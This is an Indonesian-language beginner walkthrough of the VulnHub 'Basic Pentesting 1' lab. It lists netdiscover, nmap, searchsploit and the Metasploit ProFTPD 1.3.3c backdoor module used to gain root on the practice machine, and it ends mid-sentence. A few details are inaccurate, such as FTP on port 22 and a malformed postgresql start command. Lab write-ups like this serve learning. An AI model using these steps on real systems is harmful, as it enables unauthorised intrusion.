Basic Pentesting 1 tersedia di VulnHub. Tingkat kesulitannya adalah "Mudah" Ini berisi beberapa Kelemahan Eskalasi Jarak Jauh dan Privilege. Ada banyak hal baru bagi pemula seperti saya untuk belajar darinya. Tujuannya adalah mendapatkan root.
Melalui panduan ini, saya akan menggunakan Parrot Sec OS tetapi Anda dapat menggunakan Kali atau distro lainnya.
Impor dan hidupkan, Gunakan netdiscover untuk menentukan IP
sudo netdiscover -i wlan0 -r 192.168.8.1/24
Sekarang Anda Jalankan port Nmap scan.
nmap -A -p- 192.168.8.163
Server FTP (ProFTPD 1.3.3c) yang berjalan pada port 22 tampaknya rentan. Gunakan SearchSploit untuk mencari eksploit yang terkait dengan sofware Itu
searchsploit Proftpd 1.3.3c
Oke Brother Kita telah menemukan modul Metasploit untuk kerentanan itu. Sekarang, jalankan Metasploitnya..
sudo postgresql start
sudo msfconsole
msf> search Proftpd 1.3.3c
Oke Kita telah menemukan modul Dari Metasploit "exploit / unix / ftp / proftpd_133c_backdoor".
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST 192.168.8.163
Sekaran Jalankan Modulnya
Dan di sini, kita berhasil mendapatkan akses ROOT. Harus ada kelemahan lain di HTTP,